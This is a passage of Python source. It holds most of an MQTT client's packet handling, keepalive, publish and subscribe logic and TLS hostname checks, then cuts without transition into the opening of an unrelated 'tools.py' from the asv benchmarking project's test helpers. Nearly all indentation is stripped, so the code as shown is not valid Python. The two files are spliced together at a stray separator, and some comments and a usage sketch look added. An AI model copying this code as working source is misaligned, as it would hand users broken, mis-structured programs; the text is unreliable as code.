# Then try to read the remaining length. This may fail because it may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
if self._ssl:
command = self._ssl.read(1)
else:
command = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
if len(command) == 0:
return 1
command = struct.unpack("!B", command)
self._in_packet['command'] = command[0]
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
if self._ssl:
byte = self._ssl.read(1)
else:
byte = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
byte = struct.unpack("!B", byte)
byte = byte[0]
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] = self._in_packet['remaining_length'] + (byte & 127)*self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
if self._ssl:
data = self._ssl.read(self._in_packet['to_process'])
else:
data = self._sock.recv(self._in_packet['to_process'])
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
self._in_packet['to_process'] = self._in_packet['to_process'] - len(data)
self._in_packet['packet'] = self._in_packet['packet'] + data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._msgtime_mutex.release()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
if self._ssl:
write_length = self._ssl.write(packet['packet'][packet['pos']:])
else:
write_length = self._sock.send(packet['packet'][packet['pos']:])
except AttributeError:
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except socket.error as err:
self._current_out_packet_mutex.release()
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
if write_length > 0:
packet['to_process'] = packet['to_process'] - write_length
packet['pos'] = packet['pos'] + write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
self._callback_mutex.acquire()
if self.on_publish:
self._in_callback = True
self.on_publish(self, self._userdata, packet['mid'])
self._in_callback = False
self._callback_mutex.release()
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, 0)
self._in_callback = False
self._callback_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
self._out_packet_mutex.acquire()
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
self._out_packet_mutex.release()
else:
pass # FIXME
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, buf):
if self.on_log:
self.on_log(self, self._userdata, level, buf)
def _check_keepalive(self):
now = time.time()
self._msgtime_mutex.acquire()
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
self._msgtime_mutex.release()
if (self._sock is not None or self._ssl is not None) and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
self._msgtime_mutex.acquire()
self._last_msg_out = now
self._last_msg_in = now
self._msgtime_mutex.release()
else:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
def _topic_wildcard_len_check(self, topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if '+' in topic or '#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time.time()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
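# Worked example (illustrative): the MQTT remaining-length encoding above stores
# 7 bits per byte and sets the top bit when another byte follows. For a remaining
# length of 321:
#   321 % 128 = 65, 321 // 128 = 2  -> first byte 65 | 0x80 = 0xC1 (continuation)
#   2 % 128 = 2,    2 // 128 = 0    -> second byte 0x02 (final)
# so 321 is encoded as the two bytes 0xC1 0x02.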
def _pack_str16(self, packet, data):
if sys.version_info[0] < 3:
if isinstance(data, bytearray):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
elif isinstance(data, unicode):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
else:
if isinstance(data, bytearray) or isinstance(data, bytes):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
def _send_publish(self, mid, topic, payload=None, qos=0, retain=False, dup=False):
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
utopic = topic.encode('utf-8')
command = PUBLISH | ((dup&0x1)<<3) | (qos<<1) | retain
packet = bytearray()
packet.extend(struct.pack("!B", command))
if payload is None:
remaining_length = 2+len(utopic)
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"' (NULL payload)")
else:
if isinstance(payload, str):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
elif isinstance(payload, bytearray):
payloadlen = len(payload)
elif isinstance(payload, unicode):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
remaining_length = 2+len(utopic) + payloadlen
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length = remaining_length + 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
if payload is not None:
if isinstance(payload, str):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
elif isinstance(payload, bytearray):
packet.extend(payload)
elif isinstance(payload, unicode):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
else:
raise TypeError('payload must be a string, unicode or a bytearray.')
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid, dup=False):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL|2, mid, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2+len(protocol) + 1+1+2 + 2+len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags = connect_flags | 0x02
if self._will:
if self._will_payload is not None:
remaining_length = remaining_length + 2+len(self._will_topic) + 2+len(self._will_payload)
else:
remaining_length = remaining_length + 2+len(self._will_topic) + 2
connect_flags = connect_flags | 0x04 | ((self._will_qos&0x03) << 3) | ((self._will_retain&0x01) << 5)
if self._username:
remaining_length = remaining_length + 2+len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2+len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H"+str(len(protocol))+"sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t[0])+1
command = SUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
packet.extend(struct.pack("B", t[1]))
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
mutex.acquire()
now = time.time()
for m in messages:
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
m.dup = True
self._send_pubrel(m.mid, True)
mutex.release()
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
self._out_message_mutex.acquire()
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
self._out_message_mutex.release()
def _messages_reconnect_reset_in(self):
self._in_message_mutex.acquire()
for m in self._in_messages:
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(self._in_messages.index(m))
else:
# Preserve current state
pass
self._in_message_mutex.release()
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
self._out_packet_mutex.acquire()
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
self._current_out_packet_mutex.release()
self._out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if not self._in_callback and self._thread is None:
return self.loop_write()
else:
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command']&0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
self._callback_mutex.acquire()
if self.on_connect:
self._in_callback = True
if sys.version_info[0] < 3:
argcount = self.on_connect.func_code.co_argcount
else:
argcount = self.on_connect.__code__.co_argcount
if argcount == 3:
self.on_connect(self, self._userdata, result)
else:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
self.on_connect(self, self._userdata, flags_dict, result)
self._in_callback = False
self._callback_mutex.release()
# Start counting for stable connection
self._backoffCore.startStableConnectionTimer()
if result == 0:
rc = 0
self._out_message_mutex.acquire()
for m in self._out_messages:
m.timestamp = time.time()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
if m.qos == 0:
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_puback
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubrec
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubcomp
self._in_callback = True # Don't call loop_write after _send_pubrel()
rc = self._send_pubrel(m.mid, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B"*len(packet)
granted_qos = struct.unpack(pack_format, packet)
self._callback_mutex.acquire()
if self.on_subscribe:
self._in_callback = True
self.on_subscribe(self, self._userdata, mid, granted_qos)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08)>>3
message.qos = (header & 0x06)>>1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet)-slen) + 's'
(message.topic, packet) = struct.unpack(pack_format, packet)
if len(message.topic) == 0:
return MQTT_ERR_PROTOCOL
if sys.version_info[0] >= 3:
message.topic = message.topic.decode('utf-8')
if message.qos > 0:
pack_format = "!H" + str(len(packet)-2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d"+str(message.dup)+
", q"+str(message.qos)+", r"+str(message.retain)+
", m"+str(message.mid)+", '"+message.topic+
"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time.time()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
self._in_message_mutex.acquire()
self._in_messages.append(message)
self._in_message_mutex.release()
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
self._in_message_mutex.acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
self._handle_on_message(self._in_messages[i])
self._in_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
self._out_message_mutex.acquire()
rc = self._update_inflight()
self._out_message_mutex.release()
if rc != MQTT_ERR_SUCCESS:
self._in_message_mutex.release()
return rc
self._in_message_mutex.release()
return self._send_pubcomp(mid)
self._in_message_mutex.release()
return MQTT_ERR_SUCCESS
def _update_inflight(self):
# Don't lock message_mutex here
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages = self._inflight_messages + 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for m in self._out_messages:
if m.mid == mid:
m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time.time()
self._out_message_mutex.release()
return self._send_pubrel(mid, False)
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
self._callback_mutex.acquire()
if self.on_unsubscribe:
self._in_callback = True
self.on_unsubscribe(self, self._userdata, mid)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
self._callback_mutex.acquire()
if self.on_publish:
self._out_message_mutex.release()
self._in_callback = True
self.on_publish(self, self._userdata, mid)
self._in_callback = False
self._out_message_mutex.acquire()
self._callback_mutex.release()
self._out_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
self._out_message_mutex.release()
return rc
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
except IndexError:
# Have removed item so i>count.
# Not really an error.
pass
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
self._callback_mutex.acquire()
matched = False
for t in self.on_message_filtered:
if topic_matches_sub(t[0], message.topic):
self._in_callback = True
t[1](self, self._userdata, message)
self._in_callback = False
matched = True
if matched == False and self.on_message:
self._in_callback = True
self.on_message(self, self._userdata, message)
self._in_callback = False
self._callback_mutex.release()
def _thread_main(self):
self._state_mutex.acquire()
if self._state == mqtt_cs_connect_async:
self._state_mutex.release()
self.reconnect()
else:
self._state_mutex.release()
self.loop_forever()
def _host_matches_cert(self, host, cert_host):
if cert_host[0:2] == "*.":
if cert_host.count("*") != 1:
return False
host_match = host.split(".", 1)[1]
cert_match = cert_host.split(".", 1)[1]
if host_match == cert_match:
return True
else:
return False
else:
if host == cert_host:
return True
else:
return False
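# Worked example (added note, not in the original source): with the rule above,
# _host_matches_cert("foo.example.com", "*.example.com") returns True, because both
# sides reduce to "example.com" after the first label, while
# _host_matches_cert("a.b.example.com", "*.example.com") returns False, since the
# wildcard only covers a single leading label; non-wildcard names must match exactly.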
def _tls_match_hostname(self):
try:
cert = self._ssl.getpeercert()
except AttributeError:
# getpeercert() can raise an AttributeError ("object has no attribute 'peer_certificate'").
# Don't let that crash the whole client. See also: http://bugs.python.org/issue13721
raise ssl.SSLError('Not connected')
san = cert.get('subjectAltName')
if san:
have_san_dns = False
for (key, value) in san:
if key == 'DNS':
have_san_dns = True
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
if key == 'IP Address':
have_san_dns = True
if value.lower().strip() == self._host.lower().strip():
return
if have_san_dns:
# Only check subject if subjectAltName dns not found.
raise ssl.SSLError('Certificate subject does not match remote hostname.')
subject = cert.get('subject')
if subject:
for ((key, value),) in subject:
if key == 'commonName':
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
raise ssl.SSLError('Certificate subject does not match remote hostname.')
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
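# Hedged usage sketch (added for illustration, not part of the original file): the
# compatibility class above is a drop-in alias for Client, so code written against
# mosquitto.py only needs its import changed. The broker host and port below are
# placeholder assumptions; connect() and loop_forever() are the standard client calls
# provided earlier in this module.
def _example_mosquitto_compat():
    def on_message(mosq, userdata, msg):
        # msg is an MQTTMessage with .topic and .payload, as built in _handle_publish()
        pass
    client = Mosquitto("example-client")
    client.on_message = on_message
    client.connect("localhost", 1883, 60)  # assumed broker; keepalive of 60 seconds
    client.loop_forever()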
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
from asv import util
from asv import commands
from asv import config
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
def run_asv(*argv):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
def init(self):
hglib.init(self.path)
